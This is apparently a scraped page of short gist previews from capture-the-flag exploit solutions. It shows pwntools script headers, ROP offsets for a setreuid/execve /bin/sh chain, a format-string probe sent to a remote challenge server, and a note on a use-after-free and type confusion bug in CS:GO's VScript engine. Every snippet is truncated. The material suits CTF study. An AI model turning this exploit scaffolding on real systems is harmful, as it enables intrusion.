Discord flag.
Brute force byte-by-byte and apply encrypt function to verify.
from pwn import *
from pwn import * | |
context.update(os='linux', arch='amd64') | |
r = process('./minho') | |
l = ELF('/lib/x86_64-linux-gnu/libc.so.6') | |
def new(size, data, abuse_scanf=0): | |
r.sendlineafter(b'> ', b'1') | |
r.sendlineafter(b': ', b'0' * abuse_scanf + str(size).encode()) |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <stdarg.h> | |
#include <string.h> | |
#include <fcntl.h> | |
#include <unistd.h> | |
#include <sys/mman.h> | |
#define INFO "[*] " |
#!/usr/bin/env python3 | |
import struct | |
import sys | |
libc = int(sys.argv[1], 16) - 0x270b3 | |
setreuid = 0x117ab0 | |
execve = 0xe62f0 | |
binsh = 0x1b75aa | |
poprdx = 0x11c371 |
#!/usr/bin/env python3 | |
from pwn import * | |
context.clear(arch='amd64', os='linux', endian='little') | |
r = remote('125.235.240.166', 33333) | |
# 1st boss | |
r.sendline(b'%p') |
#!/usr/bin/env python3 | |
from pwn import * | |
context.clear(arch='amd64', os='linux', endian='little') | |
libc = ELF('./libc-2.31.so') | |
MY_IP = b'' | |
r = remote('125.235.240.166', 20120) |
This challenge involves an old version of CS:GO VScript, which is vulnerable to a UAF bug and a type confusion bug.
The sort function of squirrel array is array_sort
in sqbaselib.cpp
, which will call _qsort
:
// v: VM, o: array object, func: compare func
#!/usr/bin/env python3 | |
from pwn import * | |
context.os = 'linux' | |
context.arch = 'amd64' | |
context.terminal = ['tmux', 'new-window'] | |
l = ELF('./libc-2.31.so') |
#!/usr/bin/env python3 | |
from pwn import * | |
context.os = 'linux' | |
context.arch = 'amd64' | |
context.terminal = ['tmux', 'sp', '-v', '-p', '90'] | |
b = ELF('./secret_keeper') | |
l = ELF('/lib/x86_64-linux-gnu/libc-2.31.so') |
#!/usr/bin/env python3 | |
from pwn import * | |
context.os = 'linux' | |
context.arch = 'amd64' | |
b = ELF('./sandboxd') | |
l = ELF('./libc-2.31.so') | |
context.terminal = ['tmux', 'sp', '-h', '-p', '80'] |